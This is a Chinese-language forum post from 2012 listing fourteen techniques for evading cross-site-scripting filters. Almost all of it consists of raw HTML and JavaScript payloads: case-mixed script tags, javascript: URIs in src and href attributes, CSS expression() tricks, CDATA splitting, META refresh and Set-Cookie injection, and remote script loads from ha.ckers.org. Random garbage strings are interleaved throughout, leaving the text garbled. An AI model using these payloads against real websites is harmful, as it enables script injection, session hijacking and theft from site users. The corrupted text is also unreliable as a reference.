1. 改变字符大小写% i5 q6 m; M2 q
5 N8 w0 u3 ]9 A8 [: y5 f
. ]0 \% {" T, S9 f
! ^8 _, v8 {, ]
<sCript>alert(‘d’)</scRipT>+ S; \& N# h4 i/ d# ?5 d
4 N# B9 X. y/ `6 U S
2. 利用多加一些其它字符来规避Regular Expression的检查
# p2 l |- M) T- K/ k5 H1 ^
0 h. j6 c+ \' S <<script>alert(‘c’)//<</script>4 i6 k# a, H$ l5 L2 j2 `1 Q1 N2 f* V
: D6 U }; @! s1 b- ^1 L# l
<SCRIPT a=">" SRC="t.js"></SCRIPT>* A6 H% h# [, [; c' N5 ~, i2 T
# ~/ l; |* e; \9 m <SCRIPT =">" SRC="t.js"></SCRIPT>
# P' I% h, |- s, c0 H( h
6 Y# X" G$ A! V# k( [' p <SCRIPT a=">" ” SRC="t.js"></SCRIPT>
# u+ {$ J* {. \! \1 F
* }2 |. N; c+ p- B <SCRIPT "a=’>’" SRC="t.js"></SCRIPT>
7 u( b5 F7 f! m, R6 V! B. _
8 u5 q1 d+ @1 f6 \) N% @" Q <SCRIPT a=`>` SRC="t.js"></SCRIPT>! \- K! A$ o, v2 g
* C; Z( J7 t _4 r7 [, A1 x0 i8 s <SCRIPT a=">’>" SRC="t.js"></SCRIPT>
6 m& o: u) u; P% l2 g) z) a
, |# d R. u+ G9 U: v: H2 ]8 D, c! `3. 以其它扩展名取代.js/ T/ Z5 z% [, V0 ^! T' j
- p2 U; d g; M' a7 H7 d) t$ r) Q! w
<script src="bad.jpg"></script>
' u E( u m9 I
5 _4 R1 ]3 j& U5 d: |: j' l6 y4. 将Javascript写在CSS档里: w( Y: ]- w+ u$ I; w
5 d- F" j5 e" S0 ~
<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">8 m, T. X& u7 r+ }
0 m* q) X' n7 J* h) ~0 W
example:9 K' L: l7 e/ e! J u8 B, s
, I: x' U5 n2 o
body {1 m' l7 ^4 k2 u+ c% @5 ?* H( P
& @5 p+ e) O; {/ g: e
background-image: url(‘javascript:alert("XSS");’)( D4 V5 Q, E3 T: \
& }2 R# ]6 P7 L Z }; m- m+ T( h ]+ R) c3 f# k" t
\3 C y* i$ i$ A$ V* C
5. 在script的tag里加入一些其它字符6 ^, z) |' \) p1 V* g& [: }- Y
" Z! ~! ] D3 G% r ~
<SCRIPT/SRC="t.js"></SCRIPT>. Y8 R7 Z: o5 ?; b( S* U# |
% s& D$ j( h1 M7 W: c5 `
<SCRIPT/anyword SRC="t.js"></SCRIPT>1 a* ]# j+ W7 D/ ^0 y$ J2 V
$ t/ M) Y" b! U8 d3 Q e7 D
6. 使用tab或是new line来规避# c0 W5 K% h0 T$ a5 w: ~! S- m
0 h. `6 ?7 z: z
<img src="jav ascr ipt:alert(‘XSS3′)">
2 R+ [5 w! Q# k+ P( R0 A+ ]! ?8 { ~' x, D+ l
<img src="jav ascr ipt:alert(‘XSS3′)">" ^, Y+ R8 w' R
5 A% S' |: t9 P5 U <IMG SRC="jav ascript:alert(‘XSS’);">6 R1 N0 R8 h @( j( }. c9 t7 w( T* ]' e) j
& \' h. Q8 G* w+ m. d7 Y. j8 d -> tag
1 I; A1 T. t% Z1 S$ k8 N X+ {* n X" r/ M
-> new line5 H/ ?1 d6 m4 E. t% B" v/ m8 V8 p' n
/ @" h" O6 Z6 e& A1 ?* U0 s7. 使用"\"来规避
0 S4 K# u0 Z9 @0 @- Z* r
, z! Y) C* M3 v: x2 ~ <STYLE>@im\port’\ja\vasc\ript:alert("XSS32")’;</STYLE>5 _ C6 \8 V9 ?% q4 _
5 q8 [- C$ {) }8 Z
<IMG STYLE=’xss:expre\ssion(alert("XSS33"))’>
7 d5 a/ h% V/ X
# |( z7 h( a/ K9 C* p+ X5 {, f <IMG STYLE="xss:expr/*anyword*/ession(alert(‘sss’))">& O; ] {7 k! {5 a6 O3 Y
) B5 t) j1 F- g% U! l4 l9 K <DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">
5 [( P9 f6 K3 d* w+ W
. \. t/ u0 B0 V8 U3 J6 y( W <A STYLE=’no\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))’>, K0 `0 \6 M$ e" K
. U% D9 q1 y5 E! K* b8 B+ R8. 使用Hex encode来规避(也可能会把";"拿掉)1 [* V5 Q I9 M/ r0 L
$ U# H( C' a" R# h" `7 L5 A <DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">
+ |" `' q3 i6 b4 M
" ~- g* E0 N1 H P4 H3 a4 Z 原始码:<DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">
: E6 P0 a( V! X6 J7 X# g- [; b0 c4 S2 G% [4 J+ j) w* k
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);">* r, X) ?' ]6 q7 P7 e
" a: S9 \$ S( B8 I, i3 D 原始码:<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);">% |" J2 v6 J" R9 D& o
! w6 h2 h1 h: K0 G9. script in HTML tag2 O( G m* g u' e+ L
- B/ I8 |1 W; W4 }" F
<body onload=」alert(‘onload’)」>
) L# J' A/ e5 X$ G2 n3 V, A6 D' G. u0 k
onabort, onactivate, onafterprint, onafterupdate, onbeforeactivate, onbeforecopy, onbeforecut, onbeforedeactivate, onbeforeeditfocus, onbeforepaste, onbeforeprint, onbeforeunload, onbeforeupdate, onblur, onbounce, oncellchange, onchange, onclick, oncontextmenu, oncontrolselect, oncopy, oncut, ondataavailable, ondatasetchanged, ondatasetcomplete, ondblclick, ondeactivate, ondrag, ondragend, ondragenter, ondragleave, ondragover, ondragstart, ondrop, onerror, onerrorupdate, onfilterchange, onfinish, onfocus, onfocusin, onfocusout, onhelp, onkeydown, onkeypress, onkeyup, onlayoutcomplete, onload, onlosecapture, onmousedown, onmouseenter, onmouseleave, onmousemove, onmouseout, onmouseover, onmouseup, onmousewheel, onmove, onmoveend, onmovestart, onpaste, onpropertychange, onreadystatechange, onreset, onresize, onresizeend, onresizestart, onrowenter, onrowexit, onrowsdelete, onrowsinserted, onscroll, onselect, onselectionchange, onselectstart, onstart, onstop, onsubmit, onunload
' X5 H4 Q6 a, l% H. u' r+ [
9 u$ V5 x4 |( I+ V& @/ p# v) S10. 在swf里含有xss的code( M( }" c6 X; k5 |; o, w2 A7 x
0 D) f6 T5 U' d <EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>
) A: K! E- B$ |8 r
; ~/ D# ?& }. t+ p& v11. 利用CDATA将xss的code拆开,再组合起来。
9 M) E+ ~% k6 t! e1 Y* }& g' Z2 s2 F2 F: R
<XML ID=I><X><C>0 a+ A) W3 K; e: \9 v6 @
* W A# T# K3 V
<![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]># q. x/ j' k7 ~! n4 ]
: V! D/ z3 w7 _, {
</C></X>
2 ?: h; u: X0 W I+ J' U
) v- }6 T* z, O3 H ~ </xml>( @2 E" Z3 O O
% V1 t; P4 I) V5 G
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>1 M6 s. V. H& ~2 G: m7 A6 ^& \
' e& v% \1 C$ O' R+ b0 s& G
<XML ID="xss"><I><B><IMG SRC="javas<!– –>cript:alert(‘XSS’)"></B></I></XML>
6 `) L) {6 [% }. w' w, J0 H3 Q# E
7 m" q, G! V3 Y" g7 v <SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
8 R- a( y1 x- R8 a+ [8 C5 P( t6 c3 R g" }
12. 利用HTML+TIME。9 d x9 ~' b9 H# ?5 K! E
! W* K0 s. I1 e1 }: e <HTML><BODY># o$ V8 G/ P- j% p, M* M+ I
4 B' p7 Y; Z+ [+ w6 @# T. O& z
<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">; d" n3 F9 V3 H
$ u& G/ [8 u, v x! J' C5 a" R
<?import namespace="t" implementation="#default#time2">
: I6 X" ^1 g7 ~9 u6 d$ n% ~) f! C# N6 E" Z4 L
<t:set attributeName="innerHTML" to="anyword<SCRIPTDEFER>alert("XSS")</SCRIPT>">
' P* H" r/ n" [) M$ B2 X0 f6 ?' ?' n" D3 Z6 g9 \8 ]
</BODY></HTML>+ s( A+ N3 ? |) ?( a9 z
" c; q. ?4 m" [ w' W& J" Q1 O
13. 透过META写入Cookie。( D1 A' c p5 o6 p
. P& ?6 a6 r( |( A! F2 u
<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert(‘XSS’)</SCRIPT>">
: U; y, y$ z9 |, Q9 x
( h6 I c! h( e6 A0 f2 e2 e" L14. javascript in src , href , url
2 ]$ y$ h3 B/ \4 Z% f6 p# I0 F/ v, \2 N$ X; B+ i6 |1 H
<IFRAME SRC=javascript:alert(’13′)></IFRAME>
0 m+ |* N' Y+ L3 |! f3 i z8 f+ q- i- \* w. R
<img src="javascript:alert(‘XSS3′)">
/ l- \/ J8 ]1 a* E. d( F" y( C# z3 Y. P# g) C7 k5 [
<IMG DYNSRC="javascript:alert(‘XSS20′)">
$ p2 B) u" Z. ]6 ] _$ j- a0 q9 X3 `, ]
<IMG LOWSRC="javascript:alert(‘XSS21′)">6 r$ x4 l0 ]) H
0 R M0 v0 G7 A o <LINK REL="stylesheet" HREF="javascript:alert(‘XSS24′);">% V1 g% y) w2 G1 p7 ?
- t! n. N+ K; ^/ Q4 q
<IFRAME SRC=javascript:alert(‘XSS27′)></IFRAME>2 b* W8 x6 `' ~7 u+ W e+ ?! I. w: B
. ?: T& ]( g- o3 @! [1 b& N
<TABLE BACKGROUND="javascript:alert(‘XSS29′)">$ K: O/ ^7 C4 {, A- @% b
2 K( L9 `5 e# W# z, h <DIV STYLE="background-image: url(javascript:alert(‘XSS30′))">
! f; W( \3 H! @3 |7 z5 F4 j# q! j: u4 D6 n$ Q) ~# p/ N, H9 ]
<STYLE TYPE="text/css">.XSS{background image:url("javascript:alert(‘XSS35′)");}
4 z i. n0 \% N m2 q$ E% d& W g+ T0 m0 q! u
</STYLE><A CLASS=XSS></A>8 v& }" Y/ ] Q; K7 t7 M# q
4 Z( q) @9 \' C/ u <FRAMESET><FRAME SRC="javascript:alert(‘XSS’);"></FRAMESET>) h- S* O# u' u6 u- W
. G6 L7 A( v# M$ A7 V& Q! f) Z' r
|
发表于 2012-12-31 09:59:28
收藏
支持
反对